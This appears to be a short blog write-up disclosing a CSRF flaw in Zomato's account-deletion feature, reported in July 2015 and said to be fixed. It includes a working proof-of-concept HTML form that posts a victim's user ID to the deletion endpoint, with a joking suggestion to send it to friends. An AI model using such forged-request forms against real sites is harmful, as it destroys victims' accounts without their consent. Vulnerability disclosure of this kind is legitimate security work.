How i deleted your zomato account !

Hi, friends :D,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.

I was catched by it soi was messing around with zomato now while checking out the settings section i found the “delete my account ” option and after clicking on that a prompt will occur like this

  zomato hack

Now to delete the account you have to type delete inside it and confirm! but there was a flaw there was no csrf token available to validate the request!.

What is CSRF TOKEN ?
CSRF token is a protective measure used to prevent cross site request forgery attacks which checks that the request is coming from the legitimate user or not !

Now Exploitation Part 
I created a quick working code which allows you to delete the any user’s account so now to delete his or her account you just need to send this code via html or as a link. 😛

Code?
<html>
<body>
<form action=”https://www.zomato.com/php/delete_user_profile.php method=”POST”>

<input type=”hidden” name=”reason” value=”woot woot”>

<input type=”hidden” name=”userid” value=”[User ID to whom you wanna delete]”>

<input type=”submit”  value=”Submit request”>

</form>

</body>
</html>

Video Poc :
save this as delete.html and send this to your friend!

https://www.youtube.com/watch?v=fRjdyg6s9rU

Exploitability?

it was easy to grab any user  ==>userid by just visiting their profile and copy that user id. Which increased it severity 😉

Fixing Time line:

[+] July 21, 2015 Reported to Support team

[+] Bug Fixed by team .

Let #internet be #safer place 🙂
signoff

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s